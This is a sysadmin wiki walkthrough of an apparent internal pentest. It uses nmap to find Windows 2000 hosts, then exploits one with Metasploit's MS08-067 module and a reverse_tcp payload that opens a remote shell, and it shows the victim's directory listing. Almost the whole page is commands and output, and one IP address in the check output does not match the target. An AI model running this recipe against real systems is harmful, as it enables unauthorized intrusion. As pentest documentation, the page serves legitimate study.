Sysadmin > SecurityAndPentests > MetaSploit > MsNetapiWin2000
Changes | Index | Search
Tags(edit)

metasploit ms08_067_netapi on Windows 2000

Some nmap investigations beforehand

We like to find the exact version of the operating system. 

nmap -Pn --script smb-os-discovery.nse -pT:139,445 10.128.0.0/16 > 10.128.0.0-16.20150331.oss

Next we like to sum up the output. 

cat 10.12[815].0.0-16.20150331.oss | grep "\(Nmap\ scan\ report\ for\ \|OS:\|Computer\ name:\)" | sed ':a;N;$!ba;s/\n|\ \ / /g' | grep OS | grep "OS: Windows 2000"
Nmap scan report for mos.dummy.de (10.120.2.121)  OS: Windows 2000 (Windows 2000 LAN Manager)  Computer name: mos
Nmap scan report for tima.dummy.de (10.120.10.20)  OS: Windows 2000 (Windows 2000 LAN Manager)  Computer name: tima
Nmap scan report for idswin.dummy.de (10.120.10.31)  OS: Windows 2000 (Windows 2000 LAN Manager)  Computer name: IDSWIN
Nmap scan report for edsospc.dummy.de (10.120.10.39)  OS: Windows 2000 (Windows 2000 LAN Manager)  Computer name: edsospc
Nmap scan report for eds2.dummy.de (10.120.10.43)  OS: Windows 2000 (Windows 2000 LAN Manager)  Computer name: eds2
Nmap scan report for mcu.dummy.de (10.120.10.46)  OS: Windows 2000 (Windows 2000 LAN Manager)  Computer name: mcu
Nmap scan report for 10.121.169.121  OS: Windows 2000 (Windows 2000 LAN Manager)  Computer name: sv2002
Nmap scan report for lib01pc.dummy.de (10.128.74.20)  OS: Windows 2000 (Windows 2000 LAN Manager)  Computer name: dic

now lets try metasploit on the last one 

# msfconsole
[...]
msf >

Let's search an exploit 

msf> search smb
long output 

msf > info windows/smb/ms08_067_netap
Choose an exploit 
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) >

msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting
Set target 
msf exploit(ms08_067_netapi) > set RHOST 10.128.74.20
RHOST => 10.128.74.20

Search for a payload 
msf exploit(ms08_067_netapi) > show payloads
long output

Choose payload 
msf exploit(ms08_067_netapi) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp


msf exploit(ms08_067_netapi) > show options

[...]
Payload options (windows/shell/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (accepted: seh, thread, process, none)
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port

[...]

Set payload options 
msf exploit(ms08_067_netapi) > set LHOST 10.128.32.98
LHOST => 10.128.32.98

Check if it is vulerable 

msf exploit(ms08_067_netapi) > check
[+] 10.128.73.21:445 - The target is vulnerable.

Run exploit 
msf exploit(ms08_067_netapi) > run

[*] Started reverse handler on 10.128.32.98:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows 2000 - Service Pack 4 with MS05-010+ - lang:English
[*] Selected Target: Windows 2000 Universal
[*] Attempting to trigger the vulnerability...
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 10.128.74.20
[*] Command shell session 1 opened (10.128.32.98:4444 -> 10.128.74.20:4301) at 2015-03-31 13:25:49 +0200

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>cd c:\
cd c:\

C:\>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 14BB-15E2

 Directory of C:\

05/07/2010  08:38a      <DIR>          adaptec
09/23/2010  12:24p                  83 ADIC_PROGRESS.TXT
07/11/2006  11:59a                 489 ARCSETUP.LOG
12/04/2014  10:41a      <DIR>          backup
07/11/2006  01:06p      <DIR>          CA_APPSW
05/05/2011  11:39a      <DIR>          Documents and Settings
12/04/2014  12:38p      <DIR>          HF-1_SDLC2.8
12/29/2003  09:52p      <DIR>          Inetpub
11/10/2004  09:05p              15,369 installer_debug.txt
09/28/2005  08:22p      <DIR>          Logs
07/11/2006  12:01p      <DIR>          NSM
03/30/2015  01:00p      <DIR>          ntbackup
06/28/2013  12:26p                 279 nw_install.log
06/28/2013  12:27p                  54 nw_install_status.log
08/23/2006  12:04p             155,303 ObjectServer.Trace
03/31/2015  01:30p             772,316 ObjectServer1.trace
10/09/2004  01:34a               6,522 odbcconf.log
12/29/2014  01:32p               1,165 oswrapper1.log
12/08/2014  10:35a      <DIR>          Program Files
05/22/2007  11:17a      <DIR>          rgrg
04/08/2014  03:21p      <DIR>          WINNT
12/30/2003  12:25a      <DIR>          WUTemp
               9 File(s)        951,580 bytes
              13 Dir(s)  25,875,365,888 bytes free

C:\>exit
exit
^C
Abort session 1? [y/N]  y

[*] 10.128.74.20 - Command shell session 1 closed.  Reason: User exit
Edit | Attach | More topic actions
Copyright © Creative Commons License